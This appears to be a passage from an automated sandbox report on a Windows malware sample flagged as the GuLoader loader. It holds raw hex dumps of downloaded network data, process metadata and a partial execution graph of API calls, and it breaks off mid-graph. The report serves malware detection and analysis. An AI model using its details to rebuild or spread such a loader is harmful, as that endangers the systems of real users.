                                                                          2022-05-27 07:53:20 UTC62INData Raw: 7a 79 2f b4 c7 3a ff 12 0b 85 c2 fb f5 15 f8 ae 7f a5 71 35 ac bb 3b 34 d9 fe c7 74 ae 69 0f 46 8b a5 a7 db 40 20 2b 03 23 6a c3 c0 91 35 37 f8 c8 db 4a f6 2e 8e 42 0f 89 25 1c bd 31 81 9e 72 d4 e2 b5 bb ee da 33 50 1a f7 e3 cb 13 ab b8 81 85 d5 15 6f 4f 13 d5 ba 47 e7 dc 2a 8d d0 67 84 cc 75 01 df d1 6f 36 90 7a 71 69 3a 99 2e 5b 96 ac a6 0a 78 9e 5a d8 90 9b bd 64 27 84 4b 3b a2 f8 8f 4a 03 7d 42 6a 80 77 bf f5 f0 08 bd 15 04 36 6f e1 b6 bf 6f ba 80 aa e7 0c 0c 54 df eb f5 85 10 44 dc 7f 65 e2 0d 2a 58 58 8d 6f 1e f0 ec b2 a2 7f dd 1f a7 7a 1d 83 97 d9 fc 78 e6 e1 a3 21 a6 94 e0 f4 6f e5 9f 7a 04 5e 62 23 79 89 1b ca 81 cf 8b 9e 44 a6 9f 4a f9 47 c0 74 bc b6 ab 77 c7 1c a8 93 dc 69 5c 0c 8c 1b ed 25 ac 57 01 6e bc 36 ad 63 06 f0 c7 20 9d a6 20 a4 83 7a
                                                                          Data Ascii: zy/:q5;4tiF@ +#j57J.B%1r3PoOG*guo6zqi:.[xZd'K;J}Bjw6ooTDe*XXozx!oz^b#yDJGtwi\%Wn6c z
                                                                          2022-05-27 07:53:20 UTC70INData Raw: 33 e2 4b 6b 5c 11 09 50 f8 92 1e 8c d9 bd 88 fb 54 35 34 92 6c 08 1d e6 57 92 85 eb 1d 6c 0b 99 01 ff aa 3b 1d 3a f6 28 a3 3d 67 2c d2 e0 65 71 d5 1c 0f fd 9f c3 3b 4f f0 9b 59 c1 da d7 5e f3 8a fd a3 18 ac 40 86 9e 8f 30 ac d1 c6 55 f8 09 da 30 27 70 2c 8b 53 ed e2 18 9c 29 d6 41 6e e8 e5 05 f0 fd 47 fa d2 78 16 db 2d f7 6c 29 a2 00 e6 48 83 d5 2c 8f ae 06 d2 88 e3 d1 f0 9c 83 54 42 57 9e 78 10 66 ae c1 d7 55 b9 60 81 be 1a 52 11 a8 05 48 9a 9b d7 1a 7f 49 8f fc 12 6b f6 8e ef 11 9a 09 69 de 97 15 7d 9c 6f 97 06 32 53 0a 67 f1 29 a8 3b 22 76 5d f4 e6 de 52 da 0f 4c 03 e7 28 b8 2d 8e df ba 26 94 29 ec a7 13 78 c0 6f f1 76 ab 00 3d 9c 1a 3d c2 18 ae f7 3a 96 27 02 29 06 b4 08 74 47 d2 4f 6c 99 b1 5d 4c 10 3c cb 52 fc ee a5 1e a3 9d d8 90 3f 31 82 1c 6d d5
                                                                          Data Ascii: 3Kk\PT54lWl;:(=g,eq;OY^@0U0'p,S)AnGx-l)H,TBWxfU`RHIki}o2Sg);"v]RL(-&)xov==:')tGOl]L<R?1m
                                                                          2022-05-27 07:53:20 UTC78INData Raw: d7 ff 6f cb c6 cc 6c 08 ea d8 cd ab 98 58 cc 6c c1 a1 f3 f5 d1 31 e6 20 8c 62 5c 78 68 f5 5f 2a 9d 9e 96 7f c6 1d 6c 1b 65 12 85 56 ce f4 c7 49 27 43 84 bb f1 06 87 85 ea 2f 8c 74 75 95 9c 76 2e 50 e8 2c 04 e6 53 17 43 fa 46 dc 70 a6 04 82 5e 99 36 52 0c c7 90 af a4 61 22 e5 d2 dc ec d6 c8 d2 6d a1 af b0 b4 36 1a 45 56 15 44 de 58 6b 2d c1 3f 9b 85 aa b0 e1 46 4a ad ac a0 09 7b 8f 96 02 ff 28 98 b8 0a 21 e4 2a d1 00 ec c8 d2 50 4d d4 b4 c3 c6 51 d6 37 45 8c 54 cb 47 b9 09 d6 57 4f c7 49 45 91 2a da e5 f0 e7 53 70 89 43 84 66 90 c8 98 b2 c0 d1 ca 48 fd 38 0e 39 83 ce 6e 42 87 48 94 35 27 6b 3d 2c d5 45 ce 98 b5 a1 ea fe 7d 01 93 28 33 ec 6f f4 57 af c3 87 5c b9 74 76 34 b5 2d 47 de 78 de e2 86 3c 91 fd a3 56 5f 24 12 7b a0 23 dd 4f 78 8b b5 07 94 57 f4 72
                                                                          Data Ascii: olXl1 b\xh_*leVI'C/tuv.P,SCFp^6Ra"m6EVDXk-?FJ{(!*PMQ7ETGWOIE*SpCfH89nBH5'k=,E}(3oW\tv4-Gx<V_${#OxWr
                                                                          2022-05-27 07:53:20 UTC86INData Raw: cb 52 60 a7 6f c1 ee e1 bd 71 5f e9 65 70 a4 03 be 86 06 d8 60 9f ce e6 30 86 a3 cb 09 50 98 1d 84 72 c6 70 46 63 3a 8a fe 8c 90 17 3d 4b 4c 54 33 63 3b 41 e5 6e ff e7 0a dd de ee 1d 0c 45 01 46 ca 8c fc 2d 25 dc 44 c8 bb 97 3e a1 55 a3 93 57 51 40 3b 54 9e 30 60 d5 2e b4 b7 78 d3 81 50 e8 f2 6b f2 3f e6 7f ea 4b 41 58 26 f1 13 2b 46 de 6e 44 6d 1b 11 a9 15 72 79 58 93 b5 26 d9 c4 af 93 8c 90 0a 82 b8 1b 2d 85 02 fb 73 6a 10 32 12 6c ba 44 38 a3 d2 6e 20 74 07 d5 10 89 33 64 f6 26 12 fb 71 da 3d 6e 14 0c 68 c0 2d cd dd de b8 34 8e 10 39 3d 9c 5a ac 3c 30 f4 aa 17 91 43 04 b5 0f 28 d4 03 fb 3d ae 5a 5d ad b5 e2 7d 23 7f e5 9f 4e eb 94 a3 32 e5 cb 0e 10 77 e4 10 44 8e dd 72 e4 37 e6 d3 c5 b4 a1 2c 4f aa 7f b4 91 be 86 3b c7 51 71 61 3a df f7 48 1c 9b cb b9
                                                                          Data Ascii: R`oq_ep`0PrpFc:=KLT3c;AnEF-%D>UWQ@;T0`.xPk?KAX&+FnDmryX&-sj2lD8n t3d&q=nh-49=Z<0C(=Z]}#N2wDr7,O;Qqa:H
                                                                          2022-05-27 07:53:20 UTC94INData Raw: 50 16 12 44 5f 42 57 4e a5 eb c8 2b 45 76 bd 47 a8 46 49 81 df 2d 0d 62 2c c8 26 4b 0f aa e0 b3 e1 66 be bf d1 39 21 b9 ce 66 05 90 44 9c 25 12 5e df 2a 86 4c fd 4a 6e 4d 60 7d ca 37 9d 7b f0 a3 7e b8 e8 67 07 5f 55 40 74 e7 fd 1f 23 87 86 00 58 7d 34 57 f4 6b 38 64 b7 91 8c fd 9b 13 ed 2e 8e 10 51 26 94 c8 63 c5 49 f5 55 fd 0c 04 11 d2 3b 25 9a 84 94 e7 23 f9 54 63 d2 fd 79 d9 e2 50 c8 47 d2 1b 44 96 f7 0b c5 fc 31 ab 03 71 8b 75 59 a3 9d e3 c4 bd 75 22 66 90 a9 7c f1 eb 2c bb 19 88 19 c0 ae 4e e7 f3 2e 9c 3b b4 b3 9f a2 8d e6 cb 79 39 79 5d ec be e5 ad a4 5e 04 f5 89 27 20 2a 16 8b 90 12 7e 56 93 5d 47 b0 e8 34 6b d5 92 f9 75 f0 1c df dd d9 ab a6 29 65 fc 68 b2 79 d4 63 f3 39 a9 f4 54 7a d2 61 79 b2 c4 6c ec 3e 13 e4 33 65 bd bb 11 b4 75 74 a7 8e a3 c2
                                                                          Data Ascii: PD_BWN+EvGFI-b,&Kf9!fD%^*LJnM`}7{~g_U@t#X}4Wk8d.Q&cIU;%#TcyPGD1quYu"f|,N.;y9y]^' *~V]G4ku)ehyc9Tzayl>3eut
                                                                          2022-05-27 07:53:20 UTC101INData Raw: 34 54 33 4b c9 4b 9a fb 9d c3 45 58 e8 e9 cd e9 0c 62 f7 74 1f b9 c1 6d 31 79 f7 c7 f3 05 50 94 f4 6c ce b8 aa a1 d9 ec c0 e3 4c 4b b2 27 9c 8b d5 75 92 29 45 a2 87 f2 bd 3e b2 cb 85 06 2e 36 72 dc e7 c5 d0 43 86 9e 87 ed 0f 43 6c 90 53 73 78 d8 dd 6e 87 49 bd 3a 85 c1 e8 9a b9 86 83 57 ce e9 fb 11 2b 78 3d 04 4d 1a 76 dd d1 9c 56 08 29 6e 20 65 8a a9 7c 56 85 28 5c 2c fe 71 ea 65 89 e2 24 87 c9 0f 00 3f e3 da 2d 50 be a2 4a 79 a0 ae a0 57 4a 8b b5 d6 3a 16 f4 05 08 ee 43 10 13 25 b8 2d 35 cb e3 cb f2 32 5d f8 22 28 9c ea 3e 2e 96 42 cc 62 0d 51 82 2d ee 01 6f df 39 a6 06 eb ea 97 63 71 e0 af b6 52 c4 6b 27 f3 9c fb 5a 56 96 9b 1f 45 9b d8 ca de c3 58 c0 f6 1d c2 72 c6 de 82 77 bf 8d 77 60 bf 15 3d 4d 7f 94 be de fd ae a0 aa 64 23 1e b5 50 a1 d5 85 f8 c4
                                                                          Data Ascii: 4T3KKEXbtm1yPlLK'u)E>.6rCClSsxnI:W+x=MvV)n e|V(\,qe$?-PJyWJ:C%-52]"(>.BbQ-o9cqRk'ZVEXrww`=Md#P
                                                                          2022-05-27 07:53:20 UTC109INData Raw: 88 5a a2 0b 5f 34 99 79 b5 14 3a f3 40 c2 9e 44 76 d3 16 ab af cf 35 ac c2 64 8a 51 41 6f e6 d3 96 79 5f ae 8e 15 a9 0c 9b 3e 61 67 85 18 47 38 49 20 fc 07 3d 4e 6c 24 47 f9 d4 87 e1 8c 40 74 b9 1e 9d e9 5d 9b 54 80 cd 34 cd dd 55 76 88 3d 61 83 ce 93 bf 51 b7 78 7b dd 4c 1d 2c c2 b7 18 5c 77 80 8e 61 59 55 47 a0 3c a7 02 56 0d e2 90 5c 16 11 5c c5 3a 43 7f 8c 29 91 0b c9 44 23 f5 bd 83 e4 80 2d 72 3a d2 5b 26 3f f0 15 7e f3 b7 b2 7c 47 a3 61 ab 1f 17 ac a5 89 3d d9 29 25 29 8c f9 9c 7e 6e c8 7c 97 3d 76 4a 1d 21 34 7d 60 27 21 d8 c7 ee 54 94 a5 fe 10 a6 68 dc bf 87 2c 83 97 57 7f 27 52 cd 37 27 74 a6 76 b6 63 40 e5 a7 a4 6a 7e cc 89 9a d1 5f da 1a 59 42 d0 1b 8b 67 cc cd 43 c4 8e 80 1a 7f 45 8f a8 9c cd 18 bf 65 64 0d 01 9b 21 09 52 60 7d a6 34 9d 7b f0
                                                                          Data Ascii: Z_4y:@Dv5dQAoy_>agG8I =Nl$G@t]T4Uv=aQx{L,\waYUG<V\\:C)D#-r:[&?~|Ga=)%)~n|=vJ!4}`'!Th,W'R7'tvc@j~_YBgCEed!R`}4{
                                                                          2022-05-27 07:53:20 UTC117INData Raw: 5a da dd a2 4f af 7f f1 4d f5 0c 04 11 68 90 27 0d 56 e0 6d a2 ff 68 92 a8 f4 5d 4d 0a f8 81 aa 2d b3 af 33 e9 86 40 66 cd 3e ad aa 56 65 f9 b6 9d 4d 11 91 21 e7 bc b0 d5 47 4a 16 81 c0 da 71 94 95 ca 66 cd 32 cb c1 75 67 08 a2 be 06 b1 4c d7 35 a4 f8 20 a1 b7 45 64 77 f3 55 54 b8 a7 4c 75 4b 79 16 65 35 b9 b4 ca 3d 04 f0 c3 a1 81 28 c8 24 20 21 22 75 16 e1 e3 b2 68 75 6e e7 ff c5 25 b2 c3 0c 01 62 ff d1 b2 cf 28 73 a9 99 24 fa c2 07 29 ee dd ad d3 cc 1c 8c 9e 74 70 56 98 39 3a 9c 9d 15 f1 3e 06 f8 e0 1d 2b cd 01 2c a0 06 6c c9 94 c0 70 91 b6 75 2c 4b 47 13 cc b3 b8 af 2b 4f 88 59 db 43 35 51 2e 8e b0 a8 78 33 45 d8 4e 2a d6 b8 c5 8e 24 fa 60 66 d4 fb 00 34 47 d8 af d6 0b 5d a3 e6 50 a1 bb cf f9 54 8e 44 4c 6d 44 95 b6 ea 20 08 0b cb 47 09 0d 81 67 9e 19
                                                                          Data Ascii: ZOMh'Vmh]M-3@f>VeM!GJqf2ugL5 EdwUTLuKye5=($ !"uhun%b(s$)tpV9:>+,lpu,KG+OYC5Q.x3EN*$`f4G]PTDLmD Gg
                                                                          2022-05-27 07:53:20 UTC125INData Raw: 97 6f 7a 65 c7 4c ed 29 dd d1 35 ca 5f a0 e8 68 3f 49 c1 b7 33 57 c6 cb eb 9a 37 72 73 55 70 b4 17 b1 f9 53 50 df 38 ea 63 73 d4 92 96 1a 4d 71 d8 38 d8 af 79 9f c5 e2 d8 bd cb f6 d9 ee 99 19 95 09 3c 84 9a e2 32 e2 45 ab dd 17 1d 15 b5 da bf 11 18 d6 20 18 55 f6 cb 54 93 8c 8d f7 9f f0 1a 0c 70 d8 7d 01 ec e6 f5 ec 43 fe 31 8b d9 f2 15 15 47 69 b3 08 05 c2 51 9c 90 46 eb 90 5c be 79 b9 19 aa b1 13 4e b6 0b ac a5 14 f6 72 0a ff 11 2b 2b 45 c7 94 62 6d ae fb a0 ff 98 34 4a 16 1f 17 00 93 3e 8c a0 40 ac 42 ea db 20 e8 39 e2 b0 09 46 ec 69 08 e9 44 1b 35 d4 05 a8 d1 5d 60 3c 5a d4 2e 0f 99 0f 97 19 4b ee 4d 09 18 08 89 8e 49 8c 57 bd 0c ce fd 5f 30 e6 ee c7 0b 2c 0b 25 d8 c0 be 36 9c 66 7b 14 4f c7 3c c5 1e 87 ac 70 b0 dd cb 73 d6 60 0d d5 f0 b5 7d 58 a0 23
                                                                          Data Ascii: ozeL)5_h?I3W7rsUpSP8csMq8y<2E UTp}C1GiQF\yNr++Ebm4J>@B 9FiD5]`<Z.KMIW_0,%6f{O<ps`}X#
                                                                          2022-05-27 07:53:20 UTC133INData Raw: 36 96 c3 70 5a c8 6e 44 59 36 d6 97 3b 3e d1 3c 5b 61 9e ed 50 61 fb 5e 91 6b c5 ba 2a a8 c6 a6 4e 44 bc 9b 3d 46 d0 f0 9d f0 92 9a 23 9c c4 04 f8 86 c8 c4 80 b0 63 8a 02 07 5b d7 b4 fc c6 13 51 9f 9f d9 0a 89 9c 27 e4 77 a7 ba b9 7a c4 31 d8 0b 76 18 49 aa 85 cb b5 a6 95 bc 30 f1 60 c0 9e 88 f8 6a e2 fa 8c bf 98 74 a0 17 13 3c 05 5c 55 b2 19 b5 10 5b 4e 13 79 e7 3c a5 4c 4a 5a 28 79 d8 c8 7b 72 5f ef c5 ca f1 6f df eb e4 9d 57 2e ed 68 d0 40 0e 7d 81 cb cc 2a 79 ed 34 d1 8d 58 65 40 fb 6f 5b b9 a3 50 b8 65 46 e3 87 ce a2 17 a8 74 47 c4 c4 78 c1 9f 92 75 f8 32 28 f3 c0 e9 f7 25 97 ff fb a4 35 ce 9e 43 3e 47 99 b9 dd 2d 65 34 bd d3 32 77 ed 3f 12 ae f7 2e 99 10 7a 7f e2 26 2b f1 59 2a ac a5 c3 14 a4 90 d5 7f 00 5b 65 e7 45 9e 0c fd 04 da 85 c5 df 52 69 17
                                                                          Data Ascii: 6pZnDY6;><[aPa^k*ND=F#c[Q'wz1vI0`jt<\U[Ny<LJZ(y{r_oW.h@}*y4Xe@o[PeFtGxu2(%5C>G-e42w?.z&+Y*[eERi
                                                                          2022-05-27 07:53:20 UTC140INData Raw: 72 a1 79 43 7e 2b 1c 1c 10 f9 e8 cd 6b 6d ce 3a 44 f8 19 ec 45 69 cb 07 ec e6 96 b0 c4 65 c1 84 2b 22 42 e5 a7 f9 1a a3 aa a8 0b 81 69 05 2a 2f 30 59 7b d0 e9 6d 2c ac 55 81 71 5f 68 46 95 5b f2 38 dc cb 31 59 c5 ea 63 e4 52 51 1d 57 11 4b 35 02 ec 89 50 7f 33 5a 25 11 5f 52 33 f5 9b 85 3b 77 eb d9 51 3b 26 2d 65 a4 eb fc 2e 63 c2 59 26 78 8d 67 56 da eb 30 c0 3e 6e 32 18 d4 ad 30 0c 26 c3 26 a3 a0 08 20 90 89 85 77 26 f9 b6 b4 54 a0 02 15 71 0b a2 42 b5 fb 40 44 d1 8b 4b b2 04 f3 58 7b c5 f3 d1 09 6e a5 f2 ce e3 e9 81 26 1b e4 b1 87 66 88 dc 68 7c e3 4b d1 6b 46 3a 48 db aa 66 c4 df b2 25 66 4f aa 6f c8 9b e8 04 fb c2 75 80 dc cb a7 90 9d 64 d5 30 fd 33 ee 43 ec e4 d3 9a 85 9e 8f 65 3c 9c 11 0c 6e 4f 79 c0 b5 55 88 ec 92 80 d7 c0 94 4e 49 ad 06 77 a4 47
                                                                          Data Ascii: ryC~+km:DEie+"Bi*/0Y{m,Uq_hF[81YcRQWK5P3Z%_R3;wQ;&-e.cY&xgV0>n20&& w&TqB@DKX{n&fh|KkF:Hf%fOoud03Ce<nOyUNIwG
                                                                          2022-05-27 07:53:20 UTC148INData Raw: c8 26 f8 38 70 02 ec 50 96 4b e3 2a 64 e2 1f 32 0d ac 93 13 46 e7 f2 f8 42 ad 91 8a 3e 16 c9 9f 70 ae 99 80 a4 72 3f 47 3c c8 0a f8 4b 5a d2 54 3c 27 1d 2e a7 ae 06 f2 47 ae 60 b0 2f 82 a1 a0 a7 b9 cf 96 0e da 65 fa 87 9a 90 3a 31 b4 7e 43 30 55 72 7c ee c4 f1 ca 3f ed 5c 1c cf 01 8f 8b d5 4a a8 a4 f2 da 2d 1f 48 b5 02 b6 64 42 77 a1 68 c2 87 d0 7e 3c e0 8f 24 ac 1c 2a b5 bd bb 5e f2 ab d0 52 97 5d 8f 59 74 30 b8 1d 66 26 07 bd 3d 33 d1 64 34 72 2b 8e 24 d3 6a bf 56 78 ca 77 ac 5e 89 36 ea 04 76 cc 82 31 df ab e4 25 ac f1 82 43 60 e3 41 5e 45 b6 5d bb 43 d8 9f e1 7c 05 80 73 b2 e8 c5 ae eb e4 0b b7 63 7a 52 bf 60 7a 5a 8c 5f b4 7a 90 1c 42 e7 ea ca 74 74 c4 78 76 c9 23 e7 90 8a df d1 56 41 cf 64 b3 a9 9e af 29 e3 6f 87 d6 44 9c b1 76 ce 74 d4 2d 60 95 8a
                                                                          Data Ascii: &8pPK*d2FB>pr?G<KZT<'.G`/e:1~C0Ur|?\J-HdBwh~<$*^R]Yt0f&=3d4r+$jVxw^6v1%C`A^E]C|sczR`zZ_zBttxv#VAd)oDvt-`
                                                                          2022-05-27 07:53:20 UTC156INData Raw: 49 6d 82 68 97 e0 f7 50 7f 07 89 79 92 38 8c a5 e1 68 c9 31 ec 27 63 88 b5 8d 10 40 b2 3f d0 83 bb ab db 83 ac fd f9 9a f4 df 54 4f 35 06 9b fe 39 8f 24 f8 75 03 9f 46 4f 85 89 52 2c 5f 66 f7 4b f0 03 4b 8f 9d 16 e1 8c 1d bd 41 16 02 e1 b0 fc 12 56 16 6c e2 ad fb 12 fc db 0e 54 d5 d8 da b3 76 c9 75 28 1c f3 60 09 c4 e4 e0 ef 19 c7 52 74 b0 9d 22 24 2c d5 17 e5 9e 0e 1c 25 59 10 08 ad fd 56 18 f9 ed 8e e0 80 e2 4b 7d 28 a9 7a 58 d3 1a 4f a8 d2 4c 23 d1 cd 4f 25 5c 67 2a 32 74 c0 30 26 48 7c 70 a7 db 9a e7 51 8c 1f 0a 85 5d 19 c1 ca 9f b4 5d ce 7b 64 ab 2d e2 a1 0b ef 0f 42 38 58 c2 4a f9 b3 46 1a 27 8a 3c 99 57 fb 8b 4e 76 ce 29 93 31 ef 5d d7 84 f7 e3 bd 83 a0 e7 42 41 37 40 fe e4 69 7e 7a 9f 81 be 9d 6b 62 1f a0 5b 10 2f 94 60 a9 cc 87 6d 98 0b a7 55 b5
                                                                          Data Ascii: ImhPy8h1'c@?TO59$uFOR,_fKKAVlTvu(`Rt"$,%YVK}(zXOL#O%\g*2t0&H|pQ]]{d-B8XJF'<WNv)1]BA7@i~zkb[/`mU
                                                                          2022-05-27 07:53:20 UTC164INData Raw: c1 2d e3 e3 3a 5b b6 e5 a0 9b 8b 39 43 f5 eb 7c 14 1b 4c 7a 01 5b ae 17 3d 66 1d 80 cc 8d 5d 53 2c be 33 12 a6 19 fd 9a b4 a4 0a 5a 66 93 2f e0 71 aa 36 d1 bf de 4c 22 3b de f7 5d 0c 20 4c 56 1f 5e a8 4a a2 e3 64 a7 35 23 94 6f 64 fa de 26 9c ea f7 14 96 6e 5b e8 63 d8 ad 44 bf 60 6d 8a ff a9 0e ca 5a 46 3f 54 27 4c fd 49 e7 5d 61 86 62 41 eb 0b b7 ca 77 88 99 72 19 50 c1 19 64 bf 67 31 29 84 2c a1 d7 5f 5d 49 1c 52 60 a2 7c 7a f6 41 65 e6 d3 49 92 1a d0 0e 26 ff f0 60 9b 02 b4 d8 8a 0e ce 15 b2 8c 1c ee a4 e4 28 f9 93 9c 1e 5c f2 66 59 65 bd c8 53 e2 6a b1 9a cd a0 c1 9b 76 0b 5c 42 49 71 a3 36 d6 76 e4 59 f9 b4 81 fd ae 7d 84 78 1e d9 e9 65 1c f7 79 c0 6b 33 8a 65 26 0b 9a bf 7e 6e e4 69 c4 a2 dc 21 74 07 79 bf 2b 64 a7 7c 2f 35 1d 20 71 5d 9b cb d3 83
                                                                          Data Ascii: -:[9C|Lz[=f]S,3Zf/q6L";] LV^Jd5#od&n[cD`mZF?T'LI]abAwrPdg1),_]IR`|zAeI&`(\fYeSjv\BIq6vY}xeyk3e&~ni!ty+d|/5 q]


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:2
                                                                          Start time:09:52:49
                                                                          Start date:27/05/2022
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
                                                                          Imagebase:0x400000
                                                                          File size:929272 bytes
                                                                          MD5 hash:7F369D460C84146944C3C12BF83901AF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Target ID:4
                                                                          Start time:09:53:07
                                                                          Start date:27/05/2022
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
                                                                          Imagebase:0x400000
                                                                          File size:929272 bytes
                                                                          MD5 hash:7F369D460C84146944C3C12BF83901AF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:9.9%
                                                                            Dynamic/Decrypted Code Coverage:9.7%
                                                                            Signature Coverage:21.3%
                                                                            Total number of Nodes:1069
                                                                            Total number of Limit Nodes:46
                                                                            execution_graph 6962 401941 6963 401943 6962->6963 6968 402da6 6963->6968 6969 402db2 6968->6969 7013 40657a 6969->7013 6972 401948 6974 405c49 6972->6974 7055 405f14 6974->7055 6977 405c71 DeleteFileW 6983 401951 6977->6983 6978 405c88 6992 405da8 6978->6992 7069 40653d lstrcpynW 6978->7069 6980 405cae 6981 405cc1 6980->6981 6982 405cb4 lstrcatW 6980->6982 7070 405e58 lstrlenW 6981->7070 6984 405cc7 6982->6984 6987 405cd7 lstrcatW 6984->6987 6990 405ce2 lstrlenW FindFirstFileW 6984->6990 6987->6990 6989 405dd1 7101 405e0c lstrlenW CharPrevW 6989->7101 6990->6992 6998 405d04 6990->6998 6992->6983 7098 406873 FindFirstFileW 6992->7098 6994 405d8b FindNextFileW 6994->6998 6999 405da1 FindClose 6994->6999 6995 405c01 5 API calls 6997 405de3 6995->6997 7000 405de7 6997->7000 7001 405dfd 6997->7001 6998->6994 7009 405d4c 6998->7009 7074 40653d lstrcpynW 6998->7074 6999->6992 7000->6983 7004 40559f 24 API calls 7000->7004 7003 40559f 24 API calls 7001->7003 7003->6983 7006 405df4 7004->7006 7005 405c49 60 API calls 7005->7009 7008 4062fd 36 API calls 7006->7008 7007 40559f 24 API calls 7007->6994 7010 405dfb 7008->7010 7009->6994 7009->7005 7009->7007 7075 405c01 7009->7075 7083 40559f 7009->7083 7094 4062fd MoveFileExW 7009->7094 7010->6983 7026 406587 7013->7026 7014 4067aa 7015 402dd3 7014->7015 7046 40653d lstrcpynW 7014->7046 7015->6972 7030 4067c4 7015->7030 7017 406778 lstrlenW 7017->7026 7018 40668f GetSystemDirectoryW 7018->7026 7022 40657a 10 API calls 7022->7017 7023 4066a2 GetWindowsDirectoryW 7023->7026 7024 4067c4 5 API calls 7024->7026 7025 4066d1 SHGetSpecialFolderLocation 7025->7026 7029 4066e9 SHGetPathFromIDListW CoTaskMemFree 7025->7029 7026->7014 7026->7017 7026->7018 7026->7022 7026->7023 7026->7024 7026->7025 7027 406719 lstrcatW 7026->7027 7028 40657a 10 API calls 7026->7028 7039 40640b 7026->7039 7044 406484 wsprintfW 7026->7044 7045 40653d lstrcpynW 7026->7045 7027->7026 7028->7026 7029->7026 7031 4067d1 7030->7031 7033 40683a CharNextW 7031->7033 7035 406847 7031->7035 7037 406826 CharNextW 7031->7037 7038 406835 CharNextW 7031->7038 7051 405e39 7031->7051 7032 40684c CharPrevW 7032->7035 7033->7031 7033->7035 7035->7032 7036 40686d 7035->7036 7036->6972 7037->7031 7038->7033 7047 4063aa 7039->7047 7042 40646f 7042->7026 7043 40643f RegQueryValueExW RegCloseKey 7043->7042 7044->7026 7045->7026 7046->7015 7048 4063b9 7047->7048 7049 4063c2 RegOpenKeyExW 7048->7049 7050 4063bd 7048->7050 7049->7050 7050->7042 7050->7043 7053 405e3f 7051->7053 7052 405e55 7052->7031 7053->7052 7054 405e46 CharNextW 7053->7054 7054->7053 7104 40653d lstrcpynW 7055->7104 7057 405f25 7105 405eb7 CharNextW CharNextW 7057->7105 7060 405c69 7060->6977 7060->6978 7061 4067c4 5 API calls 7067 405f3b 7061->7067 7062 405f6c lstrlenW 7063 405f77 7062->7063 7062->7067 7065 405e0c 3 API calls 7063->7065 7064 406873 2 API calls 7064->7067 7066 405f7c GetFileAttributesW 7065->7066 7066->7060 7067->7060 7067->7062 7067->7064 7068 405e58 2 API calls 7067->7068 7068->7062 7069->6980 7071 405e66 7070->7071 7072 405e78 7071->7072 7073 405e6c CharPrevW 7071->7073 7072->6984 7073->7071 7073->7072 7074->6998 7111 406008 GetFileAttributesW 7075->7111 7078 405c24 DeleteFileW 7080 405c2a 7078->7080 7079 405c1c RemoveDirectoryW 7079->7080 7081 405c2e 7080->7081 7082 405c3a SetFileAttributesW 7080->7082 7081->7009 7082->7081 7084 4055ba 7083->7084 7093 40565c 7083->7093 7085 4055d6 lstrlenW 7084->7085 7086 40657a 17 API calls 7084->7086 7087 4055e4 lstrlenW 7085->7087 7088 4055ff 7085->7088 7086->7085 7089 4055f6 lstrcatW 7087->7089 7087->7093 7090 405612 7088->7090 7091 405605 SetWindowTextW 7088->7091 7089->7088 7092 405618 SendMessageW SendMessageW SendMessageW 7090->7092 7090->7093 7091->7090 7092->7093 7093->7009 7095 406311 7094->7095 7097 40631e 7094->7097 7114 406183 7095->7114 7097->7009 7099 406889 FindClose 7098->7099 7100 405dcd 7098->7100 7099->7100 7100->6983 7100->6989 7102 405dd7 7101->7102 7103 405e28 lstrcatW 7101->7103 7102->6995 7103->7102 7104->7057 7106 405ed4 7105->7106 7109 405ee6 7105->7109 7108 405ee1 CharNextW 7106->7108 7106->7109 7107 405f0a 7107->7060 7107->7061 7108->7107 7109->7107 7110 405e39 CharNextW 7109->7110 7110->7109 7112 405c0d 7111->7112 7113 40601a SetFileAttributesW 7111->7113 7112->7078 7112->7079 7112->7081 7113->7112 7115 4061b3 7114->7115 7116 4061d9 GetShortPathNameW 7114->7116 7141 40602d GetFileAttributesW CreateFileW 7115->7141 7118 4062f8 7116->7118 7119 4061ee 7116->7119 7118->7097 7119->7118 7121 4061f6 wsprintfA 7119->7121 7120 4061bd CloseHandle GetShortPathNameW 7120->7118 7122 4061d1 7120->7122 7123 40657a 17 API calls 7121->7123 7122->7116 7122->7118 7124 40621e 7123->7124 7142 40602d GetFileAttributesW CreateFileW 7124->7142 7126 40622b 7126->7118 7127 40623a GetFileSize GlobalAlloc 7126->7127 7128 4062f1 CloseHandle 7127->7128 7129 40625c 7127->7129 7128->7118 7143 4060b0 ReadFile 7129->7143 7134 40627b lstrcpyA 7136 40629d 7134->7136 7135 40628f 7137 405f92 4 API calls 7135->7137 7138 4062d4 SetFilePointer 7136->7138 7137->7136 7150 4060df WriteFile 7138->7150 7141->7120 7142->7126 7144 4060ce 7143->7144 7144->7128 7145 405f92 lstrlenA 7144->7145 7146 405fd3 lstrlenA 7145->7146 7147 405fac lstrcmpiA 7146->7147 7148 405fdb 7146->7148 7147->7148 7149 405fca CharNextA 7147->7149 7148->7134 7148->7135 7149->7146 7151 4060fd GlobalFree 7150->7151 7151->7128 8765 402b59 8766 402b60 8765->8766 8767 402bab 8765->8767 8768 402ba9 8766->8768 8770 402d84 17 API calls 8766->8770 8769 40690a 5 API calls 8767->8769 8771 402bb2 8769->8771 8772 402b6e 8770->8772 8773 402da6 17 API calls 8771->8773 8774 402d84 17 API calls 8772->8774 8775 